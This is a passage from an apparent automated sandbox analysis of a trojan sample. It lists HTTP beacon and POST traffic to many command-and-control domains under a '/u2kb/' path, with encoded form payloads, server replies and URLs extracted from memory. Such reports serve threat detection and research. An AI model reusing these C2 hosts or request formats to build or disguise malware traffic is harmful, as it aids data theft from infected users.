7e 58 67 34 51 4b 48 7a 43 42 4b 47 56 48 4e 35 68 5a 33 31 5a 4b 39 4b 55 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=klWTZiHc1Nq6cgjq1Jd8ZRN5baHlyFD50izH4iQpgnd9tOEpRNdxQ6eFptfG0EfLdBgPKUQWhVmGVHJAWheP7uOudG(qUjCOc9utbmQzdc440b272uejVfCkmaQE2fuU(XSywyvxDwR1c-gSipWPXyMO~Xg4QKHzCBKGVHN5hZ31ZK9KUA).
          Source: global traffic
          HTTP traffic detected: POST /u2kb/ HTTP/1.1
          Host: www.shapshit.xyz
          Connection: close
          Content-Length: 184
          Cache-Control: no-cache
          Origin: http://www.shapshit.xyz
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
          Content-Type: application/x-www-form-urlencoded
          Accept: */*
          Referer: http://www.shapshit.xyz/u2kb/
          Accept-Language: en-US
          Accept-Encoding: gzip, deflate
          Data Ascii: s7=VfRxwRQAb9hS4igCabUOtsCX3374uptF69J5MloX8R~aTC4yCUYmtvOYT0CwwkWbg0NVwYb4~GF5dO6AVYtZ92kxcBTbTPivHcMYkTrrxLVRCG1xjws1v0l4mZ8a6dHyECXJOXJwLJSHcD44uprvKmyss6(PEHErWmvF7uXN~ToXN-P3RA).
          Source: global traffic
          HTTP traffic detected: POST /u2kb/ HTTP/1.1
          Host: www.thedivinerudraksha.com
          Connection: close
          Content-Length: 184
          Cache-Control: no-cache
          Origin: http://www.thedivinerudraksha.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
          Content-Type: application/x-www-form-urlencoded
          Accept: */*
          Referer: http://www.thedivinerudraksha.com/u2kb/
          Accept-Language: en-US
          Accept-Encoding: gzip, deflate
          Data Ascii: s7=vkRyUT9HV71KS9ipXvlbZ-TRj-BokYQsREkToK9duZC4eukj5jvU0R2rGt~cO9pT(uJlOMGPmnuvmpbies821IcteYQaHZWEeKpqim8EHhKAbzd-1a2mPVsFSWVq1s0r5Nc89uPYwmqK84sHKcF8Su1HjwOfJM163g2mFVsw3QGb~1if~g).
          Source: global traffic
          HTTP traffic detected: POST /u2kb/ HTTP/1.1
          Host: www.un-object.com
          Connection: close
          Content-Length: 184
          Cache-Control: no-cache
          Origin: http://www.un-object.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
          Content-Type: application/x-www-form-urlencoded
          Accept: */*
          Referer: http://www.un-object.com/u2kb/
          Accept-Language: en-US
          Accept-Encoding: gzip, deflate
          Data Ascii: s7=kTrEKpdLIg5nSEXFI0Q14P1jeGQ9~LifRvgha52ywm~bKCO82irUQxr6(_An12X9TV8qaTERI5qt1zpsFCdQjlPWMGL8hgS_60nCf7D1g8ap8dsp(NsC2JKeeSVsvlQZylf-dZo4WJMrvic0dpBzw8GsWCvcFtANB4bRjpVX8ICkfkJmPA).
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Server: nginx/1.18.0
          Date: Mon, 20 Mar 2023 15:59:51 GMT
          Content-Type: text/html
          Transfer-Encoding: chunked
          Connection: close
          Content-Encoding: gzip
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Server: nginx/1.18.0
          Date: Mon, 20 Mar 2023 15:59:54 GMT
          Content-Type: text/html
          Content-Length: 153
          Connection: close
          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Server: nginx
          Date: Mon, 20 Mar 2023 15:59:59 GMT
          Content-Type: text/html
          Content-Length: 199
          Connection: close
          Accept-Ranges: bytes
          Vary: Accept-Encoding,User-Agent
          Content-Encoding: gzip
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Server: nginx
          Date: Mon, 20 Mar 2023 16:00:01 GMT
          Content-Type: text/html
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          Accept-Ranges: bytes
          Vary: Accept-Encoding,User-Agent
          Data Ascii: 25d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /u2kb/?pJ=y0bMVGhK3R&amp;s7=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7Wl2JIBHu0WW9vDmQ== was not found on this server.<HR><I>www.bitservicesltd.com</I></BODY></HTML>
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 403 Forbidden
          date: Mon, 20 Mar 2023 16:00:06 GMT
          content-type: text/html
          transfer-encoding: chunked
          vary: Accept-Encoding
          server: NginX
          content-encoding: gzip
          connection: close
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Date: Mon, 20 Mar 2023 16:00:15 GMT
          Server: Apache/2.4.54 (Debian)
          X-Powered-By: PHP/7.4.33
          Strict-Transport-Security: max-age=63072000; preload
          Connection: Upgrade, close
          Transfer-Encoding: chunked
          Content-Type: text/html; charset=UTF-8
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Date: Mon, 20 Mar 2023 16:00:18 GMT
          Server: Apache/2.4.54 (Debian)
          X-Powered-By: PHP/7.4.33
          Strict-Transport-Security: max-age=63072000; preload
          Connection: Upgrade, close
          Transfer-Encoding: chunked
          Content-Type: text/html; charset=UTF-8
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          server: openresty/1.13.6.1
          date: Mon, 20 Mar 2023 16:00:34 GMT
          content-type: text/html
          content-length: 175
          connection: close
          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>openresty/1.13.6.1</center></body></html>
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Date: Mon, 20 Mar 2023 16:00:39 GMT
          Server: Apache
          Content-Length: 4406
          Connection: close
          Content-Type: text/html
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Date: Mon, 20 Mar 2023 16:00:42 GMT
          Server: Apache
          Content-Length: 4406
          Connection: close
          Content-Type: text/html; charset=utf-8
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Connection: close
          x-powered-by: PHP/8.0.28
          expires: Wed, 11 Jan 1984 05:00:00 GMT
          cache-control: no-cache, must-revalidate, max-age=0
          content-type: text/html; charset=UTF-8
          link: <https://thedivinerudraksha.com/wp-json/>; rel="https://api.w.org/"
          content-length: 11417
          content-encoding: gzip
          vary: Accept-Encoding
          date: Mon, 20 Mar 2023 16:00:49 GMT
          server: LiteSpeed
          strict-transport-security: max-age=63072000; includeSubDomains
          x-frame-options: SAMEORIGIN
          x-content-type-options: nosniff
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Date: Mon, 20 Mar 2023 16:01:02 GMT
          Server: Apache
          Upgrade: h2,h2c
          Connection: Upgrade, close
          Last-Modified: Sun, 19 Jun 2022 19:42:34 GMT
          Accept-Ranges: bytes
          Vary: Accept-Encoding
          Content-Encoding: gzip
          Content-Length: 462
          Content-Type: text/html
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 404 Not Found
          Date: Mon, 20 Mar 2023 16:01:07 GMT
          Server: Apache
          Upgrade: h2,h2c
          Connection: Upgrade, close
          Last-Modified: Sun, 19 Jun 2022 19:42:34 GMT
          Accept-Ranges: bytes
          Content-Length: 746
          Vary: Accept-Encoding
          Content-Type: text/html
          Data Ascii: <!doctype html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <title>404 Error</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="robots" content="noindex, nofollow"> <style> @media screen and (max-width:500px) { body { font-size: .6em; } } </style></head><body style="text-align: center;"> <h1 style="font-family: Georgia, serif; color: #4a4a4a; marg
          Source: cmd.exe, 00000005.00000002.569051526.0000000004904000.00000004.10000000.00040000.00000000.sdmp
          String found in binary or memory: http://fonts.googleapis.com/css?family=Open
          Source: explorer.exe, 00000004.00000002.580448726.00000000150CC000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.00000000042BC000.00000004.10000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmp
          String found in binary or memory: http://img.sedoparking.com
          Source: explorer.exe, 00000004.00000002.580448726.0000000015714000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.0000000004904000.00000004.10000000.00040000.00000000.sdmp
          String found in binary or memory: http://justinmezzell.com
          Source: SecuriteInfo.com.Trojan.Garf.Gen.6.31593.18898.exe
          String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000002.580448726.00000000158A6000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.0000000004A96000.00000004.10000000.00040000.00000000.sdmp
          String found in binary or memory: http://thedivinerudraksha.com/u2kb/?pJ=y0bMVGhK3R&s7=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7l
          Source: explorer.exe, 00000004.00000002.580448726.0000000014C16000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.0000000003E06000.00000004.10000000.00040000.00000000.sdmp
          String found in binary or memory: http://white-hat.uk/u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp
          String found in binary or memory: http://www.222ambking.org
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp
          String found in binary or memory: http://www.222ambking.org/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp
          String found in binary or memory: http://www.222ambking.org/u2kb/www.222ambking.org
          Source: explorer.exe, 00000004.00000000.327263504.0000000008260000.00000004.00000001.00020000.00000000.sdmp
          String found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp
          String found in binary or memory: http://www.avisrezervee.com
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp
          String found in binary or memory: http://www.avisrezervee.com/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp
          String found in binary or memory: http://www.avisrezervee.com/u2kb/www.avisrezervee.com
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp
          String found in binary or memory: http://www.bitservicesltd.com
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp
          String found in binary or memory: http://www.bitservicesltd.com/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmp
          String found in binary or memory: http://www.bitservicesltd.com/u2kb/www.bitservicesltd.com
          Source: explorer.exe, 00000004.00000002.580448726.0000000015714000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.0000000004904000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.dzyngiri.com
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ecomofietsen.com
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ecomofietsen.com/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ecomofietsen.com/u2kb/www.ecomofietsen.com
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.employerseervices.com
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.employerseervices.com/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.employerseervices.com/u2kb/www.employerseervices.com
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.energyservicestation.com
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.energyservicestation.com/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.energyservicestation.com/u2kb/www.energyservicestation.com
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fclaimrewardccpointq.shop
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fclaimrewardccpointq.shop/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fclaimrewardccpointq.shop/u2kb/www.fclaimrewardccpointq.shop
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.germanreps.com
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.germanreps.com/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.germanreps.com/u2kb/www.germanreps.com
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gritslab.com
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gritslab.com/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gritslab.com/u2kb/www.gritslab.com
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mygloballojistik.online
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mygloballojistik.online/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mygloballojistik.online/u2kb/www.mygloballojistik.online
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shapshit.xyz
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shapshit.xyz/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.shapshit.xyz/u2kb/www.shapshit.xyz
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thedivinerudraksha.com
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thedivinerudraksha.com/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thedivinerudraksha.com/u2kb/www.thedivinerudraksha.com
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thewildphotographer.co.uk
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thewildphotographer.co.uk/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.thewildphotographer.co.uk/u2kb/www.thewildphotographer.co.uk
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.un-object.com
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.576758060.000000000C94E000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.un-object.com/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.un-object.com/u2kb/www.un-object.com
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.white-hat.uk
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.white-hat.uk/u2kb/
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.white-hat.uk/u2kb/www.white-hat.uk
          Source: explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.younrock.com
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.younrock.com/u2kb/
          Source: cmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.younrock.com/u2kb/?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4c
          Source: explorer.exe, 00000004.00000002.571954158.0000000005AC6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.450261230.0000000005AC3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.younrock.com/u2kb/www.younrock.com
          Source: HI4NJ046K.5.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: explorer.exe, 00000004.00000002.580448726.000000001525E000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://alldomains.hosting/
          Source: explorer.exe, 00000004.00000002.580448726.000000001525E000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://alldomains.hosting/domain-registrieren.html
          Source: explorer.exe, 00000004.00000002.580448726.000000001525E000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://alldomains.hosting/e-mail-server.html
          Source: cmd.exe, 00000005.00000002.569051526.000000000444E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://alldomains.hosting/hosting-webhosting.html
          Source: HI4NJ046K.5.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: HI4NJ046K.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: HI4NJ046K.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: cmd.exe, 00000005.00000003.393433818.000000000320B000.00000004.00000020.00020000.00000000.sdmp, HI4NJ046K.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: explorer.exe, 00000004.00000002.580448726.00000000150CC000.00000004.80000000.00040000.00000000.sdmp, cmd.exe, 00000005.00000002.569051526.00000000042BC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/rene
          Source: cmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/222ambking.org?utm_source=Sedo_parked_page&utm_medium=button&utm_c
          Source: cmd.exe, 00000005.00000002.569647158.0000000005FE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
          Source: unknown | HTTP traffic detected: POST /u2kb/ HTTP/1.1
              Host: www.gritslab.com
              Connection: close
              Content-Length: 184
              Cache-Control: no-cache
              Origin: http://www.gritslab.com
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
              Content-Type: application/x-www-form-urlencoded
              Accept: */*
              Referer: http://www.gritslab.com/u2kb/
              Accept-Language: en-US
              Accept-Encoding: gzip, deflate
              Data Raw: 73 37 3d 28 66 71 54 47 58 66 5f 6b 4e 50 63 28 71 42 41 48 34 79 65 65 47 71 37 51 76 76 30 28 4b 48 6e 55 46 49 79 6f 36 46 44 47 79 4f 78 31 52 43 64 68 42 69 47 5a 54 69 70 36 4d 43 78 41 63 47 79 67 38 32 47 4b 76 51 30 79 71 62 56 46 4d 4f 67 5a 46 52 4d 6a 4a 7e 30 73 66 28 38 7a 79 58 7a 66 6e 39 50 4a 59 77 36 54 47 71 44 36 43 4e 68 44 53 6d 4f 36 4a 42 39 58 68 68 45 7a 70 39 37 45 71 79 67 43 70 6c 45 44 6a 74 62 50 61 61 41 41 54 74 76 34 66 34 75 37 70 38 65 72 6f 7a 68 30 45 50 6d 71 51 64 56 7e 6e 34 49 4a 41 62 6a 6e 67 29 2e 00 00 00 00 00 00 00 00
              Data Ascii: s7=(fqTGXf_kNPc(qBAH4yeeGq7Qvv0(KHnUFIyo6FDGyOx1RCdhBiGZTip6MCxAcGyg82GKvQ0yqbVFMOgZFRMjJ~0sf(8zyXzfn9PJYw6TGqD6CNhDSmO6JB9XhhEzp97EqygCplEDjtbPaaAATtv4f4u7p8erozh0EPmqQdV~n4IJAbjng).
          Source: unknown | DNS traffic detected: queries for: www.white-hat.uk
          Source: global traffic | HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3tklxZoaLCmex8cw== HTTP/1.1
              Host: www.white-hat.uk
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /u2kb/?s7=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZjx8zjtO3/lmb0Gg==&pJ=y0bMVGhK3R HTTP/1.1
              Host: www.gritslab.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7Wl2JIBHu0WW9vDmQ== HTTP/1.1
              Host: www.bitservicesltd.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /u2kb/?s7=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUesQZcBXW4MNpIrrg==&pJ=y0bMVGhK3R HTTP/1.1
              Host: www.222ambking.org
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuNRicmmGgsJT37Uw== HTTP/1.1
              Host: www.energyservicestation.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /u2kb/?s7=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKq8rTPQW1vWIa2Wug==&pJ=y0bMVGhK3R HTTP/1.1
              Host: www.younrock.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /u2kb/?pJ=y0bMVGhK3R&s7=pn+zaWXo7szcfRSxpZYFMSllMpP2ulP+x3705F5u21IqvN9WG9kcUa2nxvPm1UX5MTo8dUhpuHauDgBRPTa7tLWBUGjKVRCVBQ== HTTP/1.1
              Host: www.thewildphotographer.co.uk
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
              Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /u2kb/?s7=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBtiTAOJDfFAse6Fg==&pJ=y0bMVGhK3R HTTP/1.1
              Host: www.shapshit.xyz
              Connection: close
              Data Raw: 00 00 00 00 00 00 00
